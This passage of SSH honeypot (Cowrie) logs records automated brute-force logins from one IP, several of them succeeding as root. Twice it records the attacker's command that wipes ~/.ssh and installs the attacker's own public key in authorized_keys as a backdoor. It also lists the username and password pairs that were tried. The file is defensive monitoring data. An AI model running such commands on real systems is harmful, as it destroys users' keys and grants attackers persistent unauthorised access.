sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:37:34.058853Z","src_ip":"212.227.235.229","session":"960ea6383318"}
{"eventid":"cowrie.login.success","username":"root","password":"a123456789","message":"login attempt [root/a123456789] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:37:34.495500Z","src_ip":"212.227.235.229","session":"960ea6383318"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:37:34.711680Z","src_ip":"212.227.235.229","session":"960ea6383318"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:37:34.712389Z","src_ip":"212.227.235.229","session":"960ea6383318"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:37:34.713229Z","src_ip":"212.227.235.229","session":"960ea6383318"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:37:34.812560Z","src_ip":"212.227.235.229","session":"960ea6383318"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:37:35.121276Z","src_ip":"212.227.235.229","session":"960ea6383318"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:37:35.121994Z","src_ip":"212.227.235.229","session":"960ea6383318"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:37:35.226339Z","src_ip":"212.227.235.229","session":"960ea6383318"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:37:35.227495Z","src_ip":"212.227.235.229","session":"960ea6383318"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52632,"dst_ip":"1.2.3.4","dst_port":22,"session":"53a19986970d","protocol":"ssh","message":"New connection: 212.227.235.229:52632 (1.2.3.4:22) [session: 53a19986970d]","sensor":"my-vps","timestamp":"2025-09-08T22:37:35.328590Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:37:35.329651Z","src_ip":"212.227.235.229","session":"53a19986970d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:37:35.430992Z","src_ip":"212.227.235.229","session":"53a19986970d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:37:35.869452Z","src_ip":"212.227.235.229","session":"53a19986970d"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:37:36.970540Z","src_ip":"212.227.235.229","session":"53a19986970d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50176,"dst_ip":"1.2.3.4","dst_port":22,"session":"b125e56e0d6c","protocol":"ssh","message":"New connection: 212.227.235.229:50176 (1.2.3.4:22) [session: b125e56e0d6c]","sensor":"my-vps","timestamp":"2025-09-08T22:37:37.067807Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:37:37.068799Z","src_ip":"212.227.235.229","session":"b125e56e0d6c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:37:37.167030Z","src_ip":"212.227.235.229","session":"b125e56e0d6c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:37:37.604008Z","src_ip":"212.227.235.229","session":"b125e56e0d6c"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:37:37.703822Z","src_ip":"212.227.235.229","session":"b125e56e0d6c"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:37:37.705382Z","src_ip":"212.227.235.229","session":"960ea6383318"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:37:48.663304Z","src_ip":"212.227.125.160","session":"5981c6d7c7e4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58157,"dst_ip":"1.2.3.4","dst_port":23,"session":"fdcfb199e5d4","protocol":"telnet","message":"New connection: 212.227.235.229:58157 (1.2.3.4:23) [session: fdcfb199e5d4]","sensor":"my-vps","timestamp":"2025-09-08T22:38:09.355818Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51504,"dst_ip":"1.2.3.4","dst_port":22,"session":"0119454447e6","protocol":"ssh","message":"New connection: 217.72.205.35:51504 (1.2.3.4:22) [session: 0119454447e6]","sensor":"my-vps","timestamp":"2025-09-08T22:38:19.452314Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:38:19.453212Z","src_ip":"217.72.205.35","session":"0119454447e6"}
{"eventid":"cowrie.session.closed","duration":12.67463731765747,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:38:22.030373Z","src_ip":"212.227.235.229","session":"fdcfb199e5d4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53344,"dst_ip":"1.2.3.4","dst_port":22,"session":"0fc48888c271","protocol":"ssh","message":"New connection: 212.227.235.229:53344 (1.2.3.4:22) [session: 0fc48888c271]","sensor":"my-vps","timestamp":"2025-09-08T22:38:22.955396Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:38:22.956850Z","src_ip":"212.227.235.229","session":"0fc48888c271"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:38:23.284896Z","src_ip":"212.227.235.229","session":"0fc48888c271"}
{"eventid":"cowrie.login.failed","username":"init","password":"password123","message":"login attempt [init/password123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:38:24.638464Z","src_ip":"212.227.235.229","session":"0fc48888c271"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:38:25.968936Z","src_ip":"212.227.235.229","session":"0fc48888c271"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39216,"dst_ip":"1.2.3.4","dst_port":22,"session":"760768a49834","protocol":"ssh","message":"New connection: 212.227.235.229:39216 (1.2.3.4:22) [session: 760768a49834]","sensor":"my-vps","timestamp":"2025-09-08T22:38:27.441751Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:38:27.442888Z","src_ip":"212.227.235.229","session":"760768a49834"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:38:33.444497Z","src_ip":"212.227.235.229","session":"760768a49834"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:38:33.446077Z","src_ip":"212.227.235.229","session":"760768a49834"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39790,"dst_ip":"1.2.3.4","dst_port":22,"session":"13c3d07eb5ef","protocol":"ssh","message":"New connection: 212.227.235.229:39790 (1.2.3.4:22) [session: 13c3d07eb5ef]","sensor":"my-vps","timestamp":"2025-09-08T22:38:40.108903Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:38:40.109884Z","src_ip":"212.227.235.229","session":"13c3d07eb5ef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39524,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c773bc0c482","protocol":"ssh","message":"New connection: 212.227.235.229:39524 (1.2.3.4:22) [session: 3c773bc0c482]","sensor":"my-vps","timestamp":"2025-09-08T22:38:40.139314Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:38:40.140085Z","src_ip":"212.227.235.229","session":"3c773bc0c482"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:38:40.209614Z","src_ip":"212.227.235.229","session":"13c3d07eb5ef"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:38:40.375310Z","src_ip":"212.227.235.229","session":"3c773bc0c482"}
{"eventid":"cowrie.login.success","username":"root","password":"Qq123456789","message":"login attempt [root/Qq123456789] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:38:40.649844Z","src_ip":"212.227.235.229","session":"13c3d07eb5ef"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:38:40.908523Z","src_ip":"212.227.235.229","session":"13c3d07eb5ef"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:38:40.909184Z","src_ip":"212.227.235.229","session":"13c3d07eb5ef"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:38:40.910235Z","src_ip":"212.227.235.229","session":"13c3d07eb5ef"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:38:41.011275Z","src_ip":"212.227.235.229","session":"13c3d07eb5ef"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:38:41.227249Z","src_ip":"212.227.235.229","session":"13c3d07eb5ef"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:38:41.228048Z","src_ip":"212.227.235.229","session":"13c3d07eb5ef"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:38:41.329457Z","src_ip":"212.227.235.229","session":"13c3d07eb5ef"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:38:41.330587Z","src_ip":"212.227.235.229","session":"13c3d07eb5ef"}
{"eventid":"cowrie.login.failed","username":"install","password":"Password123","message":"login attempt [install/Password123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:38:41.382132Z","src_ip":"212.227.235.229","session":"3c773bc0c482"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39798,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a38e5a11992","protocol":"ssh","message":"New connection: 212.227.235.229:39798 (1.2.3.4:22) [session: 0a38e5a11992]","sensor":"my-vps","timestamp":"2025-09-08T22:38:41.425776Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:38:41.426705Z","src_ip":"212.227.235.229","session":"0a38e5a11992"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@opens